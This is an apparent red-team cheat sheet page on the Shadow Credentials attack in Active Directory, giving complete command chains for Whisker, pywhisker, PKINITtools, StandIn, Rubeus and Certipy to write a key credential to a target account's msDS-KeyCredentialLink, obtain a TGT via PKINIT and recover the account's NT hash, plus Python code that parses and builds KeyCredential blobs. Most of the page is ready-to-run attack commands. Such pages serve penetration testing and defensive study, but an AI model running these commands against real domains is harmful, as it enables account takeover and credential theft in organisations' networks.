# Key Credentials Abuse

> "...if you can write to the `msDS-KeyCredentialLink` property of a user, you can retrieve the NT hash of that user." (Elad Shamir, [ref](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab))

That makes `GenericWrite` (or just `WriteProperty` on `msDS-KeyCredentialLink`) over a user or computer account effectively equivalent to DCSync rights on that single account: add your own public key to the attribute, get a TGT with PKINIT and recover the account's NT hash with U2U. The prerequisite is at least one Windows Server 2016+ DC with a certificate installed (usually from AD CS), so that PKINIT works.

{% hint style="info" %}
Remember that `WriteDacl` != `GenericWrite`: with `WriteDacl` alone you first have to grant yourself the required rights on the target object before `msDS-KeyCredentialLink` can be modified. For example, using [StandIn](https://github.com/FuzzySecurity/StandIn):

```
Cmd > Rubeus.exe createnetonly /program:cmd.exe /show /ticket:tgt.kirbi
Cmd > StandIn.exe --domain megacorp.local --object "samaccountname=snovvcrash" --grant "MEGACORP\jdoe" --type GenericAll
```

{% endhint %}

Check that the `msDS-KeyCredentialLink` attribute exists in the LDAP schema (it was introduced with the Windows Server 2016 schema) with [powerview.py](https://github.com/aniqfakhrul/powerview.py):

```
PS > Get-DomainObject -SearchBase CN=Schema,CN=Configuration,DC=megacorp,DC=local -Properties lDAPDisplayName -Where "lDAPDisplayName contains msDS-KeyCredentialLink"
```

## Whisker

* <https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab>
* <https://github.com/eladshamir/Whisker>

List all the values of the `msDS-KeyCredentialLink` attribute of a target object:

```
Cmd > .\Whisker.exe list /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local
```

Add a new value to the `msDS-KeyCredentialLink` attribute of a target object:

```
Cmd > .\Whisker.exe add /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /path:C:\Temp\cert.pfx /password:Passw0rd!
```

Remove a value from the `msDS-KeyCredentialLink` attribute of a target object:

```
Cmd > .\Whisker.exe remove /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /deviceid:00ff00ff-00ff-00ff-00ff-00ff00ff00ff
```

Clear all the values of the `msDS-KeyCredentialLink` attribute of a target object:

```
Cmd > .\Whisker.exe clear /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local
```

## pywhisker

* <https://github.com/ShutdownRepo/pywhisker>
* <https://podalirius.net/en/articles/parsing-the-msds-keycredentiallink-value-for-shadowcredentials-attack/>

```
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action add -f sqltest_cert
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
# clear only once you are done: the PKINIT step below needs the added key credential in place
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action clear
# <PFX_PASS> is the password pywhisker printed when it wrote sqltest_cert.pfx;
# gettgtpkinit.py (PKINITtools) prints the AS-REP encryption key needed by the next step
$ python3 gettgtpkinit.py megacorp.local/sqltest -cert-pfx sqltest_cert.pfx -pfx-pass <PFX_PASS> sqltest.ccache
# <AES_KEY> is that AS-REP key; getnthash.py does U2U and decrypts the PAC to recover the NT hash
$ KRB5CCNAME=sqltest.ccache python3 getnthash.py megacorp.local/sqltest -key <AES_KEY>
```
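The `list` output of Whisker/pywhisker and the `/deviceid:` argument of Whisker `remove` both come from parsing the attribute's DN-Binary values (the podalirius article linked above walks through the format). The following is an added example, not code from Whisker, pywhisker or DSInternals: it parses an `msDS-KeyCredentialLink` value into its MS-ADTS 2.2.20 entries, checks the KeyHash and KeyID the DC relies on, and rebuilds a blob in the same entry order. The sample value, its DN, timestamp and key material are constructed here for illustration.

```python
"""Parse, verify and rebuild msDS-KeyCredentialLink values (MS-ADTS 2.2.20).
Added example for this page, not code from Whisker, pywhisker or DSInternals; the
sample value at the bottom is constructed (stand-in key material, made-up DN/time)."""
import hashlib
import struct
import uuid
from datetime import datetime, timedelta, timezone

KEY_CREDENTIAL_VERSION = 0x200                       # KEY_CREDENTIAL_LINK_BLOB version 2
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE = 0x01, 0x02, 0x03, 0x04, 0x05
DEVICE_ID, CUSTOM_KEY_INFO, LAST_LOGON, CREATION_TIME = 0x06, 0x07, 0x08, 0x09
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)   # FILETIME epoch


def filetime_to_datetime(raw):
    """8-byte little-endian FILETIME (100 ns ticks since 1601) -> aware datetime."""
    (ticks,) = struct.unpack("<Q", raw)
    return EPOCH_1601 + timedelta(microseconds=ticks // 10)

def datetime_to_filetime(dt):
    return struct.pack("<Q", ((dt - EPOCH_1601) // timedelta(microseconds=1)) * 10)

def parse_dn_binary(value):
    """Split an LDAP DN-Binary string 'B:<hex length>:<hex>:<DN>' into (blob, dn)."""
    tag, length, hexdata, dn = value.split(":", 3)
    if tag != "B" or int(length) != len(hexdata):
        raise ValueError("malformed DN-Binary value")
    return bytes.fromhex(hexdata), dn

def to_dn_binary(blob, dn):
    return f"B:{len(blob) * 2}:{blob.hex().upper()}:{dn}"

def parse_key_credential(blob):
    """Return the blob's TLV entries as a list of (identifier, value) in file order."""
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != KEY_CREDENTIAL_VERSION:
        raise ValueError(f"unsupported KeyCredential version 0x{version:x}")
    entries, offset = [], 4
    while offset < len(blob):
        length, ident = struct.unpack_from("<HB", blob, offset)   # 2-byte length, 1-byte id
        value = blob[offset + 3:offset + 3 + length]
        if len(value) != length:
            raise ValueError("truncated entry")
        entries.append((ident, value))
        offset += 3 + length
    return entries

def _encode(ident, value):
    return struct.pack("<HB", len(value), ident) + value

def verify_key_credential(entries):
    """(key_hash_ok, key_id_ok): KeyHash is SHA256 over every entry after it,
    KeyID (version 0x200) is SHA256 of the KeyMaterial."""
    by_id = dict(entries)
    hash_pos = next(i for i, (ident, _) in enumerate(entries) if ident == KEY_HASH)
    tail = b"".join(_encode(i, v) for i, v in entries[hash_pos + 1:])
    return (hashlib.sha256(tail).digest() == by_id[KEY_HASH],
            hashlib.sha256(by_id[KEY_MATERIAL]).digest() == by_id[KEY_ID])

def build_key_credential(key_material, device_id, created, key_usage=0x01):
    """Assemble a version 0x200 blob in the entry order the tools on this page write."""
    tail = (_encode(KEY_MATERIAL, key_material)
            + _encode(KEY_USAGE, bytes([key_usage]))          # 0x01 = NGC
            + _encode(KEY_SOURCE, b"\x00")                    # 0 = AD
            + _encode(DEVICE_ID, device_id.bytes_le)          # GUID stored little-endian
            + _encode(CUSTOM_KEY_INFO, b"\x01\x00")           # version 1, no flags
            + _encode(LAST_LOGON, datetime_to_filetime(created))
            + _encode(CREATION_TIME, datetime_to_filetime(created)))
    return (struct.pack("<I", KEY_CREDENTIAL_VERSION)
            + _encode(KEY_ID, hashlib.sha256(key_material).digest())
            + _encode(KEY_HASH, hashlib.sha256(tail).digest()) + tail)

def inspect_value(value):
    """What `Whisker list` / `pywhisker --action list` show per value, plus integrity checks."""
    blob, dn = parse_dn_binary(value)
    entries = parse_key_credential(blob)
    by_id = dict(entries)
    key_hash_ok, key_id_ok = verify_key_credential(entries)
    return {
        "dn": dn,
        "device_id": str(uuid.UUID(bytes_le=by_id[DEVICE_ID])),   # feed to Whisker /deviceid:
        "key_usage": by_id[KEY_USAGE][0],
        "created": filetime_to_datetime(by_id[CREATION_TIME]),
        "key_id": by_id[KEY_ID].hex(),
        "key_hash_ok": key_hash_ok,
        "key_id_ok": key_id_ok,
    }

# Constructed sample: real KeyMaterial is a BCRYPT_RSAKEY_BLOB public key, here stand-in bytes.
SAMPLE_DEVICE_ID = uuid.UUID("00ff00ff-00ff-00ff-00ff-00ff00ff00ff")
SAMPLE_KEY_MATERIAL = b"RSA1" + bytes(range(64))
SAMPLE_CREATED = datetime(2024, 1, 15, 12, 0, tzinfo=timezone.utc)
SAMPLE_DN = "CN=WS01,OU=Workstations,DC=megacorp,DC=local"
SAMPLE_VALUE = to_dn_binary(
    build_key_credential(SAMPLE_KEY_MATERIAL, SAMPLE_DEVICE_ID, SAMPLE_CREATED), SAMPLE_DN)

if __name__ == "__main__":
    for key, val in inspect_value(SAMPLE_VALUE).items():
        print(f"{key:>12}: {val}")
```

Feed a real value (e.g. the `msDS-KeyCredentialLink` strings from an LDAP dump) to `inspect_value()`: the `device_id` it returns is what Whisker's `remove /deviceid:` expects, and a `key_hash_ok`/`key_id_ok` of `False` means the blob was edited by hand or corrupted and the DC will not accept it for PKINIT.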

## Certipy

`shadow auto` runs the whole chain in one go: it adds a key credential, authenticates with PKINIT, recovers the NT hash and then restores the original `msDS-KeyCredentialLink` value of the target:

```
$ certipy shadow auto -u svc_mssql@megacorp.local -k -no-pass -account sqltest -target DC01.megacorp.local -dc-ip 192.168.1.11 [-ns 192.168.1.11] [-dns-tcp]
```

## Tools

* <https://github.com/MichaelGrafnetter/DSInternals/blob/master/Documentation/PowerShell/Get-ADKeyCredential.md>
* <https://github.com/RedTeamPentesting/keycred>

